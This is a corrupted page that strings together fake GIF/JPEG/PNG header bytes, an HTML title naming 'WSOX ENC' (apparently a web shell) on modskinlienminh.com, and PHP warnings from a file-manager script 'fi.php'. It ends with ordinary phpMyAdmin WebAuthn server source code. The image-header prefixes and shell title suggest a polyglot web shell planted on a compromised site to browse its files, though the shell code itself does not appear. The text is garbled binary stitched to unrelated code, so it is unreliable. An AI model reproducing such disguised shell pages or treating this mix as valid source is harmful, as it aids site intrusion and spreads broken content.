1:45 PM 11/12/2025<!-- GIF89;a -->
<!-- GIF89;a -->
ï¿½ï¿½ï¿½ï¿½ JFIF      ï¿½ï¿½ ï¿½ 	  	 

	



 "" $(4,$&1'-=-157:::#+?D?8C49:7




7%%77777777777777777777777777777777777777777777777777ï¿½ï¿½  { ï¿½" ï¿½ï¿½               ï¿½ï¿½ 5        !1AQa"qï¿½2ï¿½ï¿½BRï¿½ï¿½#bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½                ï¿½ï¿½                 ï¿½ï¿½   ? ï¿½ï¿½D@DDD@DDD@DDkKï¿½ï¿½6 ï¿½UGï¿½4Vï¿½1ï¿½ï¿½
ï¿½ï¿½ï¿½ï¿½ï¿½ë¦Ÿï¿½@ï¿½#ï¿½ï¿½ï¿½RYï¿½dqpï¿½ 
ï¿½ï¿½ï¿½ï¿½ï¿½ ï¿½oï¿½7ï¿½mï¿½sï¿½<ï¿½ï¿½VPSï¿½e~Vï¿½Ú†8ï¿½ï¿½ï¿½Xï¿½Tï¿½ï¿½$ï¿½ï¿½cï¿½ï¿½ 9ï¿½ï¿½á˜†ï¿½m6@ WUï¿½fï¿½Donï¿½ï¿½rï¿½ï¿½5}9ï¿½ï¿½}ï¿½ï¿½hcï¿½fFï¿½ï¿½/r=hiï¿½ï¿½ ï¿½Í‡ï¿½*ï¿½ï¿½ bï¿½.ï¿½ï¿½$0ï¿½&teï¿½ï¿½yï¿½@ï¿½Aï¿½Fï¿½=ï¿½ Pfï¿½Aï¿½ï¿½aï¿½ï¿½ï¿½Ëªï¿½ÂŒï¿½Ã‰ï¿½ï¿½U|ï¿½ ï¿½	3\ï¿½×´ H SZï¿½g46ï¿½Cï¿½ï¿½×¦ï¿½Û’	ï¿½b<ï¿½ï¿½ï¿½;mï¿½ï¿½ï¿½ï¿½RpØ¹^ï¿½ï¿½l7ï¿½ï¿½*ï¿½ï¿½ï¿½ï¿½ï¿½TFï¿½}ï¿½\ï¿½Mï¿½ï¿½ï¿½M%ï¿½'ï¿½ï¿½ï¿½ï¿½ï¿½Ù Ý½ï¿½vï¿½ ï¿½ï¿½!-ï¿½ï¿½ï¿½ï¿½ï¿½?ï¿½N!Laï¿½ï¿½A+[`#ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½'ï¿½~oRï¿½?ï¿½ï¿½v^)ï¿½ï¿½=ï¿½ï¿½hï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½Xï¿½.ï¿½ï¿½ï¿½Ëƒï¿½ï¿½ï¿½ï¿½^Æï¿½ï¿½Ü¯sO"Bï¿½c>;
ï¿½eï¿½4ï¿½ï¿½5ï¿½kï¿½ï¿½/CBï¿½ï¿½.
 ï¿½J?ï¿½ï¿½;ï¿½Òˆï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½<ï¿½VZï¿½ê­¼2/)Í”jCï¿½ï¿½ï¿½×¢ï¿½Vï¿½Gï¿½!ï¿½ï¿½ï¿½!ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½ï¿½\ï¿½ï¿½ Kjï¿½Rï¿½ocï¿½hï¿½ï¿½ï¿½:Þ Iï¿½ï¿½1"2ï¿½q×°8ï¿½ï¿½Ð @×–ï¿½ï¿½ï¿½_C0ï¿½Ö€ï¿½ï¿½Aï¿½ï¿½lQï¿½ï¿½@çº¼ï¿½!7ï¿½ï¿½Fï¿½ï¿½ ï¿½]ï¿½sZ
Bï¿½62rï¿½vï¿½z~ï¿½Kï¿½7ï¿½cï¿½ï¿½5ï¿½.ï¿½ï¿½ï¿½Ó„q&ï¿½Zï¿½dï¿½<ï¿½kkï¿½ï¿½ï¿½T&8ï¿½|ï¿½ï¿½ï¿½Iï¿½ï¿½ï¿½ï¿½ Ws}ï¿½ï¿½ï¿½Ç½ï¿½cqnÎ‘ï¿½_ï¿½ï¿½ï¿½3ï¿½ï¿½|Nï¿½-y,ï¿½ï¿½iï¿½ï¿½ï¿½È—_ï¿½\60ï¿½ï¿½ï¿½@ï¿½ï¿½6ï¿½ï¿½ï¿½ï¿½D@DDD@DDD@DDD@DDD@DDcï¿½KN66<ï¿½cï¿½ï¿½64=rï¿½ï¿½ï¿½ï¿½ï¿½
ÄŽ0ï¿½ï¿½hï¿½ï¿½ï¿½t&(ï¿½hnb[ï¿½ ?ï¿½ï¿½^ï¿½ï¿½\ï¿½ï¿½Ã¢|ï¿½,ï¿½/hï¿½\ï¿½ï¿½Rï¿½ï¿½5ï¿½?
ï¿½0ï¿½!×¦Ü‰-ï¿½ï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½ï¿½Ù¬ï¿½ï¿½Qï¿½zAï¿½ï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½ï¿½Vï¿½ï¿½ï¿½ ï¿½:Rï¿½ï¿½ï¿½`ï¿½$ï¿½ï¿½ikï¿½ï¿½Hï¿½ï¿½ï¿½ï¿½D4ï¿½ï¿½ï¿½ï¿½ï¿½#dkï¿½ï¿½ï¿½ï¿½ï¿½ hï¿½}ï¿½ï¿½ï¿½ï¿½7ï¿½ï¿½ï¿½w%ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½*o8wGï¿½LycuTï¿½.ï¿½ï¿½ï¿½Ü¯7ï¿½ï¿½Iï¿½ï¿½u^ï¿½ï¿½ï¿½)ï¿½ï¿½/cï¿½,sï¿½Nqï¿½Ûºï¿½;ï¿½×šï¿½YH2ï¿½ï¿½ï¿½.5Bï¿½ï¿½ï¿½DDD@DDD@DDD@DDD@DDD@V|ï¿½aï¿½j{7cï¿½ï¿½Xï¿½F\ï¿½3MuA×¾hbï¿½	ï¿½ï¿½nï¿½ï¿½Fï¿½ï¿½ï¿½ï¿½ï¿½ï¿½	ï¿½ï¿½8ï¿½(ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½Ppï¿½\"Gï¿½`sï¿½ï¿½mï¿½ï¿½Þ§aWï¿½Kï¿½ï¿½Oï¿½ï¿½ï¿½ï¿½|;eiï¿½ï¿½ï¿½ï¿½Ö‹ï¿½[ï¿½qï¿½ï¿½";aï¿½ï¿½1ï¿½ï¿½ï¿½ï¿½Yï¿½Gï¿½W/ï¿½ß‡ï¿½&ï¿½<ï¿½ï¿½ï¿½ÐŒï¿½H'qï¿½mï¿½ï¿½<sŒÅá0™dkÈ.tc˜:z­G†:<FV2Zu“V

N(ëá’b&1K
¼Àë_Û{®®×ñ5ÇÁ(HæŒíh¡£{è.×€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆƒ*~\<Pº7 ¸ºíÀi°ïê JT8–F
	 iëÝÏêÛZZÓ·”•'àÞöx¤–F5s²ì†
ñRÇ75ïNÊÒ&I,l‘ÐÀ–ZøË®ÅX¡Ìé½_$¸o‡(šg´Ë²ù¬5§5X?Sì¤ÂÇãø‹ñ†LvÆ6†µÛ]ïÙ|bGŒ<:ÂKœs OÜû­˜Ü\|+ H²YB&—ß›[ç×_nÔƒŸüO‰Å¶ÅAÞ¤nþÝ‚£_r½ÒHç¿W8Ù5VWÂ" """ """ """ """ ""ÈXY ê?Ë!¶ê4ùŽ–íuò ®8ŽG²1AöÞE´*ÁýÀM/á—¡‘Ù
œ$@"ÏÊj·åË©Vr;À‡ÅÄ[k0e­
såh>ï¿½)ï¿½X+!ï¿½ï¿½ï¿½=ï¿½mï¿½Ûšä¸·~6a^Xï¿½)ï¿½ï¿½ï¿½,ï¿½>#&6Gï¿½ï¿½ï¿½Yï¿½ï¿½{ï¿½ï¿½ï¿½ï¿½"" """ """ """ """ ""ï¿½ï¿½at\/ï¿½aï¿½8 ï¿½yp%ï¿½lhlï¿½nï¿½ï¿½ï¿½ï¿½)ï¿½ï¿½ï¿½iï¿½tï¿½ï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½?ï¿½ï¿½<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>modskinlienminh.com - WSOX ENC</title>

‰PNG

   
IHDR   Ÿ   f   Õ†C1   sRGB ®Îé   gAMA  ±üa   	pHYs  Ã  ÃÇo¨d  GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT

h25jguaT5*！﻿‰PNG

   
IHDR   Ÿ   f   Õ†C1   sRGB ®Îé   gAMA  ±üa   	pHYs  Ã  ÃÇo¨d  GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT

h25jguaT5*！<br />
<b>Warning</b>:  Undefined variable $authorization in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>57</b><br />
<br />
<b>Warning</b>:  Undefined variable $translation in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>118</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on value of type null in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>119</b><br />
<br />
<b>Warning</b>:  file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
 in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>120</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>247</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>248</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>249</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>250</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>251</b><br />
<br />
<b>Warning</b>:  Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in <b>C:\xampp\htdocs\demo\fi.php</b> on line <b>252</b><br />
<?php

declare(strict_types=1);

namespace PhpMyAdmin\WebAuthn;

use PhpMyAdmin\TwoFactor;
use Psr\Http\Message\ServerRequestInterface;
use Webauthn\AuthenticatorSelectionCriteria;
use Webauthn\PublicKeyCredentialCreationOptions;
use Webauthn\PublicKeyCredentialDescriptor;
use Webauthn\PublicKeyCredentialRequestOptions;
use Webauthn\PublicKeyCredentialRpEntity;
use Webauthn\PublicKeyCredentialSource;
use Webauthn\PublicKeyCredentialSourceRepository;
use Webauthn\PublicKeyCredentialUserEntity;
use Webauthn\Server as WebauthnServer;
use Webauthn\TrustPath\EmptyTrustPath;
use Webmozart\Assert\Assert;

use function array_map;
use function base64_encode;
use function json_decode;
use function sodium_base642bin;
use function sodium_bin2base64;

use const SODIUM_BASE64_VARIANT_ORIGINAL;
use const SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING;

final class WebauthnLibServer implements Server
{
    /** @var TwoFactor */
    private $twofactor;

    public function __construct(TwoFactor $twofactor)
    {
        $this->twofactor = $twofactor;
    }

    public function getCredentialCreationOptions(string $userName, string $userId, string $relyingPartyId): array
    {
        $userEntity = new PublicKeyCredentialUserEntity($userName, $userId, $userName);
        $relyingPartyEntity = new PublicKeyCredentialRpEntity('phpMyAdmin (' . $relyingPartyId . ')', $relyingPartyId);
        $publicKeyCredentialSourceRepository = $this->createPublicKeyCredentialSourceRepository();
        $server = new WebauthnServer($relyingPartyEntity, $publicKeyCredentialSourceRepository);
        $publicKeyCredentialCreationOptions = $server->generatePublicKeyCredentialCreationOptions(
            $userEntity,
            PublicKeyCredentialCreationOptions::ATTESTATION_CONVEYANCE_PREFERENCE_NONE,
            [],
            AuthenticatorSelectionCriteria::createFromArray([
                'authenticatorAttachment' => 'cross-platform',
                'userVerification' => 'discouraged',
            ])
        );
        /** @psalm-var array{
         *   challenge: non-empty-string,
         *   rp: array{name: non-empty-string, id: non-empty-string},
         *   user: array{id: non-empty-string, name: non-empty-string, displayName: non-empty-string},
         *   pubKeyCredParams: list<array{alg: int, type: 'public-key'}>,
         *   authenticatorSelection: array<string, string>,
         *   timeout: positive-int,
         *   attestation: non-empty-string
         * } $creationOptions */
        $creationOptions = $publicKeyCredentialCreationOptions->jsonSerialize();
        $creationOptions['challenge'] = sodium_bin2base64(
            sodium_base642bin($creationOptions['challenge'], SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING),
            SODIUM_BASE64_VARIANT_ORIGINAL
        );
        Assert::stringNotEmpty($creationOptions['challenge']);

        return $creationOptions;
    }

    public function getCredentialRequestOptions(
        string $userName,
        string $userId,
        string $relyingPartyId,
        array $allowedCredentials
    ): array {
        $userEntity = new PublicKeyCredentialUserEntity($userName, $userId, $userName);
        $relyingPartyEntity = new PublicKeyCredentialRpEntity('phpMyAdmin (' . $relyingPartyId . ')', $relyingPartyId);
        $publicKeyCredentialSourceRepository = $this->createPublicKeyCredentialSourceRepository();
        $server = new WebauthnServer($relyingPartyEntity, $publicKeyCredentialSourceRepository);
        $credentialSources = $publicKeyCredentialSourceRepository->findAllForUserEntity($userEntity);
        $allowedCredentials = array_map(
            static function (PublicKeyCredentialSource $credential): PublicKeyCredentialDescriptor {
                return $credential->getPublicKeyCredentialDescriptor();
            },
            $credentialSources
        );
        $publicKeyCredentialRequestOptions = $server->generatePublicKeyCredentialRequestOptions(
            'discouraged',
            $allowedCredentials
        );
        /**
         * @psalm-var array{
         *   challenge: string,
         *   allowCredentials?: list<array{id: non-empty-string, type: non-empty-string}>
         * } $requestOptions
         */
        $requestOptions = $publicKeyCredentialRequestOptions->jsonSerialize();
        $requestOptions['challenge'] = sodium_bin2base64(
            sodium_base642bin($requestOptions['challenge'], SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING),
            SODIUM_BASE64_VARIANT_ORIGINAL
        );
        if (isset($requestOptions['allowCredentials'])) {
            foreach ($requestOptions['allowCredentials'] as $key => $credential) {
                $requestOptions['allowCredentials'][$key]['id'] = sodium_bin2base64(
                    sodium_base642bin($credential['id'], SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING),
                    SODIUM_BASE64_VARIANT_ORIGINAL
                );
            }
        }

        return $requestOptions;
    }

    public function parseAndValidateAssertionResponse(
        string $assertionResponseJson,
        array $allowedCredentials,
        string $challenge,
        ServerRequestInterface $request
    ): void {
        Assert::string($this->twofactor->config['settings']['userHandle']);
        $userHandle = sodium_base642bin(
            $this->twofactor->config['settings']['userHandle'],
            SODIUM_BASE64_VARIANT_URLSAFE_NO_PADDING
        );
        $userEntity = new PublicKeyCredentialUserEntity(
            $this->twofactor->user,
            $userHandle,
            $this->twofactor->user
        );
        $host = $request->getUri()->getHost();
        $relyingPartyEntity = new PublicKeyCredentialRpEntity('phpMyAdmin (' . $host . ')', $host);
        $publicKeyCredentialSourceRepository = $this->createPublicKeyCredentialSourceRepository();
        $server = new WebauthnServer($relyingPartyEntity, $publicKeyCredentialSourceRepository);
        $requestOptions = PublicKeyCredentialRequestOptions::createFromArray([
            'challenge' => $challenge,
            'allowCredentials' => $allowedCredentials,
            'rpId' => $host,
            'timeout' => 60000,
        ]);
        Assert::isInstanceOf($requestOptions, PublicKeyCredentialRequestOptions::class);
        $server->loadAndCheckAssertionResponse(
            $assertionResponseJson,
            $requestOptions,
            $userEntity,
            $request
        );
    }

    public function parseAndValidateAttestationResponse(
        string $attestationResponse,
        string $credentialCreationOptions,
        ServerRequestInterface $request
    ): array {
        $creationOptions = json_decode($credentialCreationOptions, true);
        Assert::isArray($creationOptions);
        Assert::keyExists($creationOptions, 'challenge');
        Assert::keyExists($creationOptions, 'user');
        Assert::isArray($creationOptions['user']);
        Assert::keyExists($creationOptions['user'], 'id');
        $host = $request->getUri()->getHost();
        $relyingPartyEntity = new PublicKeyCredentialRpEntity('phpMyAdmin (' . $host . ')', $host);
        $publicKeyCredentialSourceRepository = $this->createPublicKeyCredentialSourceRepository();
        $server = new WebauthnServer($relyingPartyEntity, $publicKeyCredentialSourceRepository);
        $creationOptionsArray = [
            'rp' => ['name' => 'phpMyAdmin (' . $host . ')', 'id' => $host],
            'pubKeyCredParams' => [
                ['alg' => -257, 'type' => 'public-key'], // RS256
                ['alg' => -259, 'type' => 'public-key'], // RS512
                ['alg' => -37, 'type' => 'public-key'], // PS256
                ['alg' => -39, 'type' => 'public-key'], // PS512
                ['alg' => -7, 'type' => 'public-key'], // ES256
                ['alg' => -36, 'type' => 'public-key'], // ES512
                ['alg' => -8, 'type' => 'public-key'], // EdDSA
            ],
            'challenge' => $creationOptions['challenge'],
            'attestation' => 'none',
            'user' => [
                'name' => $this->twofactor->user,
                'id' => $creationOptions['user']['id'],
                'displayName' => $this->twofactor->user,
            ],
            'authenticatorSelection' => [
                'authenticatorAttachment' => 'cross-platform',
                'userVerification' => 'discouraged',
            ],
            'timeout' => 60000,
        ];
        $credentialCreationOptions = PublicKeyCredentialCreationOptions::createFromArray($creationOptionsArray);
        Assert::isInstanceOf($credentialCreationOptions, PublicKeyCredentialCreationOptions::class);
        $publicKeyCredentialSource = $server->loadAndCheckAttestationResponse(
            $attestationResponse,
            $credentialCreationOptions,
            $request
        );

        return $publicKeyCredentialSource->jsonSerialize();
    }

    private function createPublicKeyCredentialSourceRepository(): PublicKeyCredentialSourceRepository
    {
        return new class ($this->twofactor) implements PublicKeyCredentialSourceRepository {
            /** @var TwoFactor */
            private $twoFactor;

            public function __construct(TwoFactor $twoFactor)
            {
                $this->twoFactor = $twoFactor;
            }

            public function findOneByCredentialId(string $publicKeyCredentialId): ?PublicKeyCredentialSource
            {
                $data = $this->read();
                if (isset($data[base64_encode($publicKeyCredentialId)])) {
                    return PublicKeyCredentialSource::createFromArray($data[base64_encode($publicKeyCredentialId)]);
                }

                return null;
            }

            /**
             * @return PublicKeyCredentialSource[]
             */
            public function findAllForUserEntity(PublicKeyCredentialUserEntity $publicKeyCredentialUserEntity): array
            {
                $sources = [];
                foreach ($this->read() as $data) {
                    $source = PublicKeyCredentialSource::createFromArray($data);
                    if ($source->getUserHandle() !== $publicKeyCredentialUserEntity->getId()) {
                        continue;
                    }

                    $sources[] = $source;
                }

                return $sources;
            }

            public function saveCredentialSource(PublicKeyCredentialSource $publicKeyCredentialSource): void
            {
                $data = $this->read();
                $id = $publicKeyCredentialSource->getPublicKeyCredentialId();
                $data[base64_encode($id)] = $publicKeyCredentialSource->jsonSerialize();
                $this->write($data);
            }

            /**
             * @return mixed[][]
             */
            private function read(): array
            {
                /** @psalm-var list<mixed[]> $credentials */
                $credentials = $this->twoFactor->config['settings']['credentials'];
                foreach ($credentials as &$credential) {
                    if (isset($credential['trustPath'])) {
                        continue;
                    }

                    $credential['trustPath'] = ['type' => EmptyTrustPath::class];
                }

                return $credentials;
            }

            /**
             * @param mixed[] $data
             */
            private function write(array $data): void
            {
                $this->twoFactor->config['settings']['credentials'] = $data;
            }
        };
    }
}